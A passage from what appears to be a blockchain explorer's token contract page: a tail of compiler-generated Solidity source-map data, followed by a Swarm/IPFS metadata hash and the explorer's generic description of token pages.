;;13910:18;;:::i;:::-;13823:107;13954:1;13951;13947:9;13940:16;;13657:305;;;;:::o;13968:185::-;14008:1;14025:20;14043:1;14025:20;:::i;:::-;14020:25;;14059:20;14077:1;14059:20;:::i;:::-;14054:25;;14098:1;14088:35;;14103:18;;:::i;:::-;14088:35;14145:1;14142;14138:9;14133:14;;13968:185;;;;:::o;14159:348::-;14199:7;14222:20;14240:1;14222:20;:::i;:::-;14217:25;;14256:20;14274:1;14256:20;:::i;:::-;14251:25;;14444:1;14376:66;14372:74;14369:1;14366:81;14361:1;14354:9;14347:17;14343:105;14340:131;;;14451:18;;:::i;:::-;14340:131;14499:1;14496;14492:9;14481:20;;14159:348;;;;:::o;14513:191::-;14553:4;14573:20;14591:1;14573:20;:::i;:::-;14568:25;;14607:20;14625:1;14607:20;:::i;:::-;14602:25;;14646:1;14643;14640:8;14637:34;;;14651:18;;:::i;:::-;14637:34;14696:1;14693;14689:9;14681:17;;14513:191;;;;:::o;14710:96::-;14747:7;14776:24;14794:5;14776:24;:::i;:::-;14765:35;;14710:96;;;:::o;14812:90::-;14846:7;14889:5;14882:13;14875:21;14864:32;;14812:90;;;:::o;14908:149::-;14944:7;14984:66;14977:5;14973:78;14962:89;;14908:149;;;:::o;15063:126::-;15100:7;15140:42;15133:5;15129:54;15118:65;;15063:126;;;:::o;15195:77::-;15232:7;15261:5;15250:16;;15195:77;;;:::o;15278:158::-;15360:9;15393:37;15424:5;15393:37;:::i;:::-;15380:50;;15278:158;;;:::o;15442:126::-;15492:9;15525:37;15556:5;15525:37;:::i;:::-;15512:50;;15442:126;;;:::o;15574:113::-;15624:9;15657:24;15675:5;15657:24;:::i;:::-;15644:37;;15574:113;;;:::o;15693:154::-;15777:6;15772:3;15767;15754:30;15839:1;15830:6;15825:3;15821:16;15814:27;15693:154;;;:::o;15853:307::-;15921:1;15931:113;15945:6;15942:1;15939:13;15931:113;;;16030:1;16025:3;16021:11;16015:18;16011:1;16006:3;16002:11;15995:39;15967:2;15964:1;15960:10;15955:15;;15931:113;;;16062:6;16059:1;16056:13;16053:101;;;16142:1;16133:6;16128:3;16124:16;16117:27;16053:101;15902:258;15853:307;;;:::o;16166:320::-;16210:6;16247:1;16241:4;16237:12;16227:22;;16294:1;16288:4;16284:12;16315:18;16305:81;;16371:4;16363:6;16359:17;16349:27;;16305:81;16433:2;16425:6;16422:14;16402:18;16399:38;16396:84;;;16452:18;;:::i;:::-;16396:84;16217:269;16166:320;;;:::o;16492:281::-;16575:27;16597:4;16575:27;:::i;:::-;16567:6;16563:40;16705:6;16693:10;16690:22;16669:18;16657:10;16654:34;16651:62;16648:88;;;16716:18;;:::i;:::-;16648:88;16756:10;16752:2;16745:22;16535:238;16492:281;;:::o;16779:233::-;16818:3;16841:24;16859:5;16841:24;:::i;:::-;16832:33;;16887:66;16880:5;16877:77;16874:103;;;16957:18;;:::i;:::-;16874:103;17004:1;16997:5;16993:13;16986:20;;16779:233;;;:::o;17018:180::-;17066:77;17063:1;17056:88;17163:4;17160:1;17153:15;17187:4;17184:1;17177:15;17204:180;17252:77;17249:1;17242:88;17349:4;17346:1;17339:15;17373:4;17370:1;17363:15;17390:180;17438:77;17435:1;17428:88;17535:4;17532:1;17525:15;17559:4;17556:1;17549:15;17576:180;17624:77;17621:1;17614:88;17721:4;17718:1;17711:15;17745:4;17742:1;17735:15;17762:117;17871:1;17868;17861:12;17885:117;17994:1;17991;17984:12;18008:117;18117:1;18114;18107:12;18131:117;18240:1;18237;18230:12;18254:102;18295:6;18346:2;18342:7;18337:2;18330:5;18326:14;18322:28;18312:38;;18254:102;;;:::o;18362:303::-;18502:34;18498:1;18490:6;18486:14;18479:58;18575:34;18570:2;18562:6;18558:15;18551:59;18648:5;18643:2;18635:6;18631:15;18624:30;18362:303;:::o;18675:163::-;18819:7;18815:1;18807:6;18803:14;18796:31;18675:163;:::o;18848:130::-;18925:24;18943:5;18925:24;:::i;:::-;18918:5;18915:35;18905:63;;18964:1;18961;18954:12;18905:63;18848:130;:::o;18988:124::-;19062:21;19077:5;19062:21;:::i;:::-;19055:5;19052:32;19042:60;;19098:1;19095;19088:12;19042:60;18988:124;:::o;19122:128::-;19198:23;19215:5;19198:23;:::i;:::-;19191:5;19188:34;19178:62;;19236:1;19233;19226:12;19178:62;19122:128;:::o;19260:130::-;19337:24;19355:5;19337:24;:::i;:::-;19330:5;19327:35;19317:63;;19376:1;19373;19366:12;19317:63;19260:130;:::o

Swarm Source

ipfs://8995b4ea40b00fab91391836b85be18d0dc69ed589a3ee1f6e32c0440510ccc7
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.